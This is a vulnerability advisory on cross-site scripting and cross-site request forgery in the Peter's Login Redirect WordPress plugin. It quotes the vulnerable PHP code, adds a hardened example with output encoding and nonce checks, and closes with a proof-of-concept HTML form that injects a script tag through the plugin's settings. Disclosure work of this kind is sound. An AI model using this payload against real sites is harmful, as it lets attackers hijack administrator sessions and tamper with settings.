Abstract
A Cross-Site Scripting vulnerability was found in the Peter's Login Redirect WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In addition, the plugin is vulnerable to Cross-Site Request Forgery, which allows an attacker to change any setting of this plugin. In order to exploit this issue, the attacker has to lure or force a logged-in WordPress Administrator into opening a malicious website.
OVE ID
OVE-20160724-0028
Tested versions
This issue was successfully tested on Peter's Login Redirect WordPress Plugin version 2.9.0.
Fix
This issue is resolved in Peter's Login Redirect version 2.9.1.
Introduction
The Peter's Login Redirect WordPress Plugin redirects users to different locations after logging in and logging out. A Cross-Site Scripting vulnerability was found in the Peter's Login Redirect WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In addition, the plugin is vulnerable to Cross-Site Request Forgery, which allows an attacker to change any setting of this plugin.
Details
This issue exists because Peter's Login Redirect lacks protection against Cross-Site Request Forgery attacks: the settings forms carry no nonce, so a form posted from a third-party site is processed like one submitted from the plugin's own settings page. In addition, the plugin lacks proper output encoding, rendering it vulnerable to Cross-Site Scripting. See, for example, the following code fragment, in which the stored values of $rul_url and $rul_url_logout are written into HTML attributes without encoding.
elseif( $rul_type == 'role' )
{
    // No nonce field is emitted for this form, so the submit handler cannot tell
    // a genuine settings-page post from one originating on another site (CSRF).
    $rul_rolevalues .= '<form name="rul_role_edit_form[' . $i_role . ']" action="?page=' . basename(__FILE__) . '" method="post">';
    $rul_rolevalues .= '<tr>';
    $rul_rolevalues .= '<td><p><input type="hidden" name="rul_role" value="' . $rul_value . '" /> ' . $rul_value . '</p></td>';
    $rul_rolevalues .= '<td>';
    // $rul_url is written into the value attribute without output encoding (XSS)
    $rul_rolevalues .= '<p>' . __('Login URL', 'peters-login-redirect' ) . '<br /><input type="text" size="90" maxlength="500" name="rul_role_address" value="' . $rul_url . '" /></p>';
    // $rul_url_logout is written into the value attribute without output encoding (XSS)
    $rul_rolevalues .= '<p>' . __('Logout URL', 'peters-login-redirect' ) . '<br /><input type="text" size="60" maxlength="500" name="rul_role_logout" value="' . $rul_url_logout . '" /></p>';
    $rul_rolevalues .= '</td>';
    $rul_rolevalues .= '<td><p><input name="rul_role_edit" type="submit" value="' . __( 'Edit', 'peters-login-redirect' ) . '" /> <input type="submit" name="rul_role_delete" value="' . __( 'Delete', 'peters-login-redirect' ) . '" /></p></td>';
    $rul_rolevalues .= '</tr>';
    $rul_rolevalues .= '</form>';
    $rul_roles_existing[$rul_value] = '';
    ++$i_role;
}
In order to exploit this issue, the attacker has to lure or force a logged-in WordPress Administrator into opening a malicious website.
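The following is an added example of how the two defects in the fragment above are closed in a WordPress plugin; it is not the plugin's own code and does not claim to reproduce the fix shipped in version 2.9.1. The function names rul_render_role_row() and rul_handle_role_submit(), the nonce action 'rul_role_rule' and the nonce field name 'rul_nonce' are hypothetical; esc_attr(), esc_html(), esc_attr__(), esc_html__(), esc_url_raw(), wp_unslash(), sanitize_text_field(), wp_nonce_field(), check_admin_referer(), current_user_can() and wp_die() are real WordPress core functions.

```php
<?php
// Added example, not the plugin's code. Hardened rendering and handling of a
// role redirect rule: every stored value is attribute-encoded on output, and the
// form carries a nonce that the handler verifies before touching any setting.

// Renders one editable role rule. esc_attr() encodes quotes and angle brackets,
// so a stored value such as "><script>alert(1);</script> is emitted as literal
// text and can no longer break out of the value="" attribute.
function rul_render_role_row( $i_role, $rul_value, $rul_url, $rul_url_logout ) {
    $html  = '<form name="rul_role_edit_form[' . (int) $i_role . ']" action="?page=' . esc_attr( basename( __FILE__ ) ) . '" method="post">';
    // Nonce bound to this action and the current user's session; a form posted
    // from another site cannot supply it (hypothetical action/field names).
    $html .= wp_nonce_field( 'rul_role_rule', 'rul_nonce', true, false );
    $html .= '<tr>';
    $html .= '<td><p><input type="hidden" name="rul_role" value="' . esc_attr( $rul_value ) . '" /> ' . esc_html( $rul_value ) . '</p></td>';
    $html .= '<td>';
    $html .= '<p>' . esc_html__( 'Login URL', 'peters-login-redirect' ) . '<br /><input type="text" size="90" maxlength="500" name="rul_role_address" value="' . esc_attr( $rul_url ) . '" /></p>';
    $html .= '<p>' . esc_html__( 'Logout URL', 'peters-login-redirect' ) . '<br /><input type="text" size="60" maxlength="500" name="rul_role_logout" value="' . esc_attr( $rul_url_logout ) . '" /></p>';
    $html .= '</td>';
    $html .= '<td><p><input name="rul_role_edit" type="submit" value="' . esc_attr__( 'Edit', 'peters-login-redirect' ) . '" /> <input type="submit" name="rul_role_delete" value="' . esc_attr__( 'Delete', 'peters-login-redirect' ) . '" /></p></td>';
    $html .= '</tr>';
    $html .= '</form>';
    return $html;
}

// Handles the posted form. Order matters: the capability check keeps
// non-administrators out, and the nonce check rejects any request that was not
// produced by the plugin's own settings page, which is exactly what a
// cross-site form post lacks. Returns the sanitised rule for the caller to
// persist, or null when there is nothing to process.
function rul_handle_role_submit() {
    if ( ! isset( $_POST['rul_role'] ) ) {
        return null;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    // check_admin_referer() calls wp_die() when the nonce is absent or invalid.
    check_admin_referer( 'rul_role_rule', 'rul_nonce' );

    // Normalise inputs before storage: the role is plain text, the redirect
    // targets are URLs. esc_url_raw() strips javascript: and similar schemes,
    // which limits what a later unencoded sink could be fed.
    $role       = sanitize_text_field( wp_unslash( $_POST['rul_role'] ) );
    $login_url  = isset( $_POST['rul_role_address'] ) ? esc_url_raw( wp_unslash( $_POST['rul_role_address'] ) ) : '';
    $logout_url = isset( $_POST['rul_role_logout'] )  ? esc_url_raw( wp_unslash( $_POST['rul_role_logout'] ) )  : '';

    if ( isset( $_POST['rul_role_delete'] ) ) {
        return array( 'action' => 'delete', 'role' => $role );
    }
    return array(
        'action'     => isset( $_POST['rul_role_edit'] ) ? 'edit' : 'add',
        'role'       => $role,
        'login_url'  => $login_url,
        'logout_url' => $logout_url,
    );
}
```

Input sanitisation on the way in is a defence in depth, not a substitute for encoding on the way out: the value is still passed through esc_attr() at the point where it lands inside an attribute, because that sink is what decides whether a quote character is data or markup.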
Proof of concept
<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=wplogin_redirect.php" method="POST">
<input type="hidden" name="rul_role" value="administrator" />
<input type="hidden" name="rul_role_address" value=""><script>alert(1);</script>" />
<input type="hidden" name="rul_role_logout" value="" />
<input type="hidden" name="rul_role_submit" value="Add role rule" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>